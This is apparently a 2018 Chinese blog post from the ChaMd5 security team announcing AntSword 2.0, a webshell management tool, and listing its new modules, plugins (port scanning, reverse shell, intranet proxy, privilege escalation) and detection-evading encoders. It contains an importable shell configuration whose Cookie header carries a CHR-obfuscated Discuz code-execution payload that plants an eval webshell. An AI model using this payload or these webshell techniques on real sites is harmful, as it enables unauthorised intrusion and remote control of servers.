【ChaMd5安全团队】AntSword 2.0,Hello world

ChaMd5安全团队 2018-08-31

写在前面

打算写个关于AntSword 2 系列文章,大概包括但不限于一些功能的Trick编码器编写插件编写Custom类型Shell编写... 更新频率不会太快,至于最后能不能把坑填完,我尽力而为。本篇就算是开篇吧,主要是 AntSword 2 的一些新功能概览。


文章里面有些链接没了,想深入了解的话,直接点阅读原文看 ChangeLog 吧。下面是正文。



模块增强

  • 新增源代码加载器

从 v2.0.0-beta 版本开始,我们引入了加载器这一概念。

用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编辑执行调试等操作。可直接运行>=v2.0-beta版本的开发版发行版源代码。

有关「加载器」的具体使用方式,可直接查阅 《AntSowd文档——获取蚁剑》

  • 新增「加载插件」模块

从 v2.0.0-beta 版本开始,我们引入了「插件」这一概念,用户可在不修改核心框架的情况下,通过安装不同的插件来增强、扩展蚁剑的功能。

端口扫描、Socks代理、反弹Shell、内网漏洞扫描、内网代理浏览器、内网漏洞溢出测试、后门扫描、密码爆破、打包下载、交互式终端、权限提升...

这里将没有任何拘束,可以尽情展现出你对WebShell的理解

安装插件后,可通过「加载插件」模块调用指定插件。插件有两种调用方式,分别为「单个调用」和「批量调用」,在加载插件后,根据具体的插件显示不同的结果。

有关「加载插件」的使用方式,可直接查阅 《AntSowd文档——加载插件》

如果你对编写插件有兴趣,可查阅 《AntSowd文档——插件开发》,学习如何编写自己的插件。

调用插件:

端口扫描插件的调用结果:

  • 新增「插件市场」模块

有了插件功能,如何获取插件呢?从 v2.0.0-beta 版本开始,我们引入了「插件市场」。插件作者可将自己插件提交至「插件市场」,向所有AntSword使用者分享自己的插件。

详见《AntSowd文档——插件市场》


  • 新增「编码管理」模块(thx @virink)

现在可以在「系统设置 - 编码管理」下增加用户自定义的编码器了,不需要拘泥自带的 base64 与 chrrot13base32rc4aes......尽情发挥吧

  • 新增「显示设置」模块

Shell数据列表显示太多,有些列就不能隐藏掉吗?完全没问题。

  • 新增「浏览网站」模块

碰到需要 Cookie 或者 Basic 认证的站点还要我亲自抓包来填到请求头上去?太麻烦了,直接浏览网站后点击「保存」就能自动将结果添加到 Shell 设置里了。

功能增强

  • 新增「网站备注」功能(thx @virink)

Shell 太多,容易忘记?没关系。添加备注功能来了。

  • 新增自定义「HTTP 头」和「请求数据」功能

一些奇奇怪怪的 Shell 和奇奇怪怪的网站居然要在请求的时候带上额外的 HTTP 字段?没关系,添加Shell时加上相应的请求字段就好了。

  • 新增自定义「HTTP 请求超时」功能

默认的 10s 超时在网速慢的时候动不动请求超时简直让人抓狂,呐,根据当前Shell的实际情况修改吧。

  • 新增自定义「虚拟终端执行路径」功能

偶尔也想换个自己的命令解释程序。

  • 新增自定义「虚拟终端缓存」功能

网络差的时候,将命令执行结果缓存起来(默认关闭)。

  • 新增自定义「文件管理缓存」功能

网络差的时候,将文件管理的结果缓存起来(默认开启)。

  • 新增自定义「忽略HTTPS证书」功能

过期证书站点请求总是因为证书问题请求失败,那就忽略证书检查吧。

  • 新增「随机编码器」功能

每次请求时在当前可用编码器中随机选择一种(编码器:「嚯,哈,看我72变」)。

  • 优化虚拟终端,新增「命令补全」功能

常用的命令敲的多了想吐?来试试在「虚拟终端」下按 Tab键自动补全吧。

  • 优化虚拟终端, 支持命令行粘贴

吐槽了很久的不能粘贴命令的「虚拟终端」终于支持粘贴了。

  • 新增「数据库配置」编辑功能

再也不用删掉配置新建了。

  • 新增「系统托盘」功能

窗口多的时候快速隐藏/呼出蚁剑(图标什么的别跟我说丑,你找个好看的给大伙瞅瞅?)。

  • 新增「预览文件」功能

双击文件自动预览 1.5MB 以内图片,大于该体积的图片可在菜单中选择「预览文件」。

  • 优化文件管理,文件列表快速跳行

按下键盘,自动跳到该字母开头的第一个文件所在行。

  • 优化「自动更新」功能

程序启动后1分钟自动检查更新,如果存在更新,在提示用户的同时,可直接在线更新。

插件

  • 新增「端口扫描」插件

通过 Shell 扫描内网主机开放的端口。(前面已经看过图了,就不放了)。

  • 新增「生成Shell」插件

指定密码或者随机产生连接密码,然后随机生成一个 Shell 脚本。

  • 新增「复制Shell配置」插件

团队合作管理网站必备,复制的不仅是个连接密码,还有数据库配置与 HTTP 配置。

  • 新增「Shell配置导入」插件

跟楼上那个配合使用的 :)

要不你试试导入一下下面这个 Discuz 代码执行,直接连接的模版?

{
 "category":"default",
 "url":"http://127.0.0.1/viewthread.php?tid=13&extra;=page=1",
 "pwd":"ant",
 "type":"php",
 "ip":"127.0.0.1",
 "addr":"IANA 保留地址用于本地回送",
 "encode":"UTF8",
 "encoder":"chr",
 "httpConf":{
   "body":{},
   "essay-headers":{
     "Cookie":"GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;GLOBALS[_DCACHE][smilies][replacearray]=eval(CHR(64).CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(39).CHR(97).CHR(110).CHR(116).CHR(39).CHR(93).CHR(41).CHR(59))%3B;"
   }
 },
 "otherConf":{
   "command-path":"",
   "ignore-https":1,
   "request-timeout":"5000",
   "terminal-cache":0
 },
 "ctime":1489394564927,
 "utime":1533179198874,
 "_id":"8Uhsn1z0yeUXS5iG",
 "note":""
}
  • 新增「超级终端」插件

虚拟终端执行命令不能交互,想要个交互式的 Shell?还想直接穿透内网?这里有个Demo了解一下?

http://blog.evalbug.com/2018/07/25/antsword_prompt_shell/

该插件暂时不太稳定,鉴于有朋友想尝试一下,所以提前上了,别抱太大希望。

  • 新增「BugScan 插件」插件

通过 Shell 快速创建 BugScan 节点,然后就可以对内网进行安全检测了。


其它

  • 新增 ASP xxxxdog 编码器与对应 Shell 示例

这个编码器只能用连接专属 Shell。试着阅读一下这两个脚本,对你编写自己的编码器和专属Shell会很有帮助。

  • 新增 PHP chr16rot13 编码器

  • 新增 JSPX Script 示例

  • 新增 ASP.Net eval Script 示例

  • 新增 ASP.Net Custom Script 示例

  • 修复 PHP Shell 读特殊文件无返回问题

  • 修复Windows存在A盘时hang住的问题

  • 新增更新 HTTP 配置 API

  • 修复插件市场删除插件失败的问题

  • 修复多窗口关闭错误问题

  • 修复一些数据错误

  • 优化清空所有缓存功能

  • 优化删除缓存功能

  • 优化删除数据功能

  • 优化编辑数据功能

  • 一些细节的调整

  • 更新 FontAwesome 库到 v4.5.0

  • 更新 electron API 到 v1.2.3

这个版本号读起来顺,后面再考虑更新 electron 到最新版

  • 移除 log4js 模块,把后端日志传递到前端输出

打开「开发者工具」,在「Console」下试着敲 antSword["logs"] 就可查看日志啦。



觉得不错,分享给更多人看到